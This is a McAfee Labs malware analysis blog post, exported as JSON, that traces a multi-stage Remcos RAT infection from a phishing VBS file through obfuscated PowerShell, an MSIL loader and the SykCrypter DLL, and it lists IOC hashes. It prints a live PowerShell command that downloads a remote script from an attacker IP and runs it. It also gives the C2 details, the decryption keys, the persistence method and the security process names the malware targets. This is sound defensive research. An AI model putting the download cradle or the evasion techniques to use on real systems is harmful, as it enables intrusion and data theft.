{"id":173306,"date":"2023-08-29T10:00:49","date_gmt":"2023-08-29T17:00:49","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=173306"},"modified":"2023-12-08T20:31:11","modified_gmt":"2023-12-09T04:31:11","slug":"peeling-back-the-layers-of-remcosrat-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/peeling-back-the-layers-of-remcosrat-malware\/","title":{"rendered":"Peeling Back the Layers of RemcosRat Malware"},"content":{"rendered":"

Authored by Preksha Saxena<\/p>\n

McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. <\/span>A phishing email contained a ZIP\/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file.<\/span>\u00a0<\/span><\/p>\n

Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary.<\/span>\u00a0<\/span><\/p>\n

Execution Flow:<\/span><\/b>\u00a0<\/span><\/h2>\n

\u00a0\"\"\u00a0<\/span><\/p>\n

Figure <\/span><\/i>1<\/span><\/i>: Execution Flow<\/span><\/i>\u00a0<\/span><\/p>\n

Stage 1: Analysis of VBS file<\/span><\/b>\u00a0<\/span><\/h2>\n

VBS file is downloaded from a RAR file which is named as \u201c<\/span>August 2023 Statement of Account.z<\/span><\/i>\u201d This VBS file used various techniques to make analysis very difficult; including lots of commented code, <\/span>and <\/span>random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too.<\/span>\u00a0<\/span><\/p>\n

Investigating this VBS script started with dealing with the large comment blocks as shown in figure below.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>2<\/span><\/i>:VBS Script<\/span><\/i>\u00a0<\/span><\/p>\n

\u00a0<\/span>One obfuscated string references a URL. The script <\/span>contains<\/span> a replace function <\/span>to <\/span>deobfuscate the proper command line.<\/span>\u00a0<\/span><\/p>\n

Another part of VBS script is the execute function shown in below image, which merely decodes a fake message.<\/span>\u00a0<\/span><\/p>\n

“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!”<\/span>\u00a0<\/span><\/p>\n

\"\"<\/p>\n

Figure <\/span><\/i>3<\/span><\/i>:Deobfuscating PowerShell command using replace function.<\/span><\/i>\u00a0<\/span><\/p>\n

\u00a0<\/span>The purpose of this VBS script is to download a <\/span>payload <\/span>using PowerShell. To increase the size<\/span>,<\/span> and make the script obfuscated<\/span>,<\/span> comments were added. The PowerShell command <\/span>deobfuscates<\/span> to:<\/span>\u00a0<\/span><\/p>\n

“powershell -w 1 -exeC Bypass -c “”[scriptblock]::<\/span><\/i>Create<\/span><\/i> (<\/span><\/i>(Invoke-WebRequest ‘http:\/\/212.192.219.52\/87656.txt’ -UseBasicParsing).Content).Invoke();”””<\/span><\/i>\u00a0<\/span><\/p>\n

Stage 2: Analysis of PowerShell script (87656.txt)\u00a0<\/span><\/b>\u00a0<\/span><\/h2>\n

The downloaded file<\/span>,<\/span> 87656.txt, is an obfuscated PowerShell script.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>4<\/span><\/i>:Obfuscated PowerShell Script<\/span><\/i>\u00a0<\/span><\/p>\n

\u00a0<\/span>The deobfuscation logic first searches for any variable containing \u201cmdR\u201d; in this case<\/span> the result is \u2018<\/span>MaximumDriveCount\u2019. <\/span><\/i>From this string, characters at positions [3,11,2] are selected, resulting in the string \u201ciex\u201d. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>5<\/span><\/i>:Resolving IEX<\/span><\/i>\u00a0<\/span><\/p>\n

Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm.<\/span>\u00a0<\/span><\/p>\n

Decompressed data is again a PowerShell script which is analyzed below.<\/span>\u00a0<\/span><\/p>\n

Stage 3: Analysis of decompressed PowerShell script\u00a0<\/span><\/b>\u00a0<\/span><\/h2>\n

The decompressed PowerShell script is large and obfuscated:<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>6<\/span><\/i>: Decompressed PowerShell script<\/span><\/i>\u00a0<\/span><\/p>\n

The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression \u201cieX\u201d by using the psHome variable.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>7<\/span><\/i>:Deobfuscating PowerShell script<\/span><\/i>\u00a0<\/span><\/p>\n

The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>8<\/span><\/i>: Base64 encoded data.<\/span><\/i>\u00a0<\/span><\/p>\n

The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. \u201cWintask.exe\u201d is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process.<\/span>\u00a0<\/span><\/p>\n

\"\"\u00a0<\/span>Figure <\/span><\/i>9<\/span><\/i>: Code used for PE injection.<\/span><\/i>\u00a0<\/span><\/p>\n

Windows Defender exclusions are added.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>10<\/span><\/i>: Exclusion code<\/span><\/i>\u00a0<\/span><\/p>\n

Stage 4: Analysis of decoded PE File\u00a0<\/span><\/b>\u00a0<\/span><\/h2>\n

The 1.1MB PE file is a <\/span>.<\/span>NET<\/span> binary, using an MSIL loader.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>11<\/span><\/i>: MSIL Loader<\/span><\/i>\u00a0<\/span><\/p>\n

The Main function calls the Units function<\/span>,<\/span> which calls a random function.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>12<\/span><\/i>:Main function<\/span><\/i>\u00a0<\/span><\/p>\n

The random function contains a large amount of encrypted data, stored in a text variable.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>13<\/span><\/i>: Encrypted data<\/span><\/i>\u00a0<\/span><\/p>\n

The <\/span>\u2018text\u2019 <\/span><\/i>data is first converted from string to hex array then reversed and stored in variable \u2018<\/span>array<\/span><\/i>\u2019. The decryption key is hardcoded and stored in variable \u2018<\/span>array4\u2019<\/span><\/i>. The key is \u201c<\/span>0xD7<\/span><\/i>\u201d (215 in decimal).<\/span>\u00a0<\/span><\/p>\n

\"\"<\/p>\n

Figure <\/span><\/i>14<\/span><\/i>: code for converting data to uppercase.<\/span><\/i>\u00a0<\/span><\/p>\n

The decryption loop issues the RC4 algorithm. The data decrypts a PE file<\/span>,<\/span> which is a DLL (Dynamic Link Library), loaded and executed using the \u2018<\/span>NewLateBinding.LateGet()\u2019<\/span><\/i> method, passing the payload file (dGXsvRf.dll) as an argument as shown below.<\/span>\u00a0<\/span><\/p>\n

To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process<\/span>,<\/span> malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the <\/span>\u2018NewLateBinding.LateGet()\u2019<\/span><\/i> function.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>15<\/span><\/i>: RC4 algorithm<\/span><\/i>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>16<\/span><\/i>: New instance created for decrypted dll<\/span><\/i>\u00a0<\/span><\/p>\n

Stage 5: Analysis of <\/span><\/b>dGXsvRf.dll<\/span><\/b>\u00a0<\/span><\/h2>\n

Decrypted DLL \u2018<\/span>dGXsvRf.dll<\/span><\/i>\u2019<\/span> is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>17<\/span><\/i>: Encrypted payload<\/span><\/i>\u00a0<\/span><\/p>\n

SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.\u00a0<\/span>\u00a0<\/span><\/p>\n

\"\"
\n<\/span><\/p>\n

Figure <\/span><\/i>18<\/span><\/i>: SykCryptor Encrypted data<\/span><\/i>\u00a0<\/span><\/p>\n

Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. <\/span>The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key \u201c<\/span>uQExKBCIDisposablev<\/span><\/i>\u201d.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>19<\/span><\/i>: RC4 Algorithm<\/span><\/i>\u00a0<\/span><\/p>\n

Another<\/span> .NET dll with size 0x1200 and the method name, \u201cZlas1\u201d is used for deflation.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>20<\/span><\/i>: Loading DLL for deflation.<\/span><\/i>\u00a0<\/span><\/p>\n

The DLL then decrypts a list of various <\/span>security solution process names:<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>21<\/span><\/i>:Code for decrypting Security processes Names<\/span><\/i>\u00a0<\/span><\/p>\n

The decrypted list of process names include:<\/span>\u00a0<\/span><\/p>\n

vsserv<\/span> bdservicehost<\/span> odscanui<\/span> bdagent\u00a0<\/span>\u00a0<\/span><\/p>\n

bullgaurd<\/span> BgScan <\/span> BullGuardBhvScanner etc.<\/span>\u00a0<\/span><\/p>\n

The malware also drops acopy of itself in the %appdata% folder using cmd.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>22<\/span><\/i>: Copying file.<\/span><\/i>\u00a0<\/span><\/p>\n

Persistence:<\/span><\/b>\u00a0<\/span><\/h3>\n

To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span>Figure <\/span><\/i>23<\/span><\/i>: Persistence Mechanism<\/span><\/i>\u00a0<\/span><\/p>\n

Process Injection:<\/span><\/b>\u00a0<\/span><\/h3>\n

The SykCrypter Dll decrypts and loads a .NET file and calls its \u201cGetDelegateForFunctionPointer\u201d function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, <\/span>NtUnmapViewOfSection <\/span>and so on.<\/span>\u00a0<\/span><\/p>\n

Then, finally it loads \u201cWriteProcessMemory,\u201d API which injects the decrypted payload into a process and call<\/span>s<\/span> ResumeThread.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>24<\/span><\/i>: Process Injection<\/span><\/i>\u00a0<\/span><\/p>\n

Stage 6: Analysis of <\/span><\/b>final payload<\/span><\/b>\u00a0<\/span><\/h2>\n

The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are:<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span>Figure <\/span><\/i>25<\/span><\/i>: Strings in payload<\/span><\/i>\u00a0<\/span><\/p>\n

T<\/span>he configuration file of Remcos is present in RCData \u201cSETTINGS\u201c, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long.<\/span>\u00a0<\/span><\/p>\n

\"\"<\/span><\/p>\n

Figure <\/span><\/i>26<\/span><\/i>: RC4 encrypted configuration file<\/span><\/i>\u00a0<\/span><\/p>\n

Decrypted Configuration:<\/span>\u00a0<\/span><\/p>\n

\"\"\u00a0<\/span>Figure <\/span><\/i>27<\/span><\/i>: Decrypted configuration<\/span><\/i>\u00a0<\/span><\/p>\n

The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware.<\/span>\u00a0<\/span><\/p>\n

Conclusion:<\/span><\/b>\u00a0<\/span><\/h3>\n

RemcosRat<\/span> is a complex multi-stage threat. McAfee<\/span> Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. <\/span>At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe.<\/span>\u00a0<\/span><\/p>\n

Indicators of Compromise (IOCs):\u202f<\/span><\/b>\u00a0<\/span><\/h3>\n\n\n\n\n\n\n\n\n
SHA256<\/span>\u00a0<\/span><\/td>\nFiletype<\/span>\u00a0<\/span><\/td>\n<\/tr>\n
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67<\/span>\u00a0<\/span><\/td>\nVBS<\/span>\u00a0<\/span><\/td>\n<\/tr>\n
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c<\/span>\u00a0<\/span><\/td>\nPowerShell<\/span>\u00a0<\/span><\/td>\n<\/tr>\n
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4<\/span>\u00a0<\/span><\/td>\nMSIL loader<\/span>\u00a0<\/span><\/td>\n<\/tr>\n
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf<\/span>\u00a0<\/span><\/td>\nSykCrypter<\/span>\u00a0<\/span><\/td>\n<\/tr>\n
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517<\/span>\u00a0<\/span><\/td>\nRemcos Payload<\/span>\u00a0<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n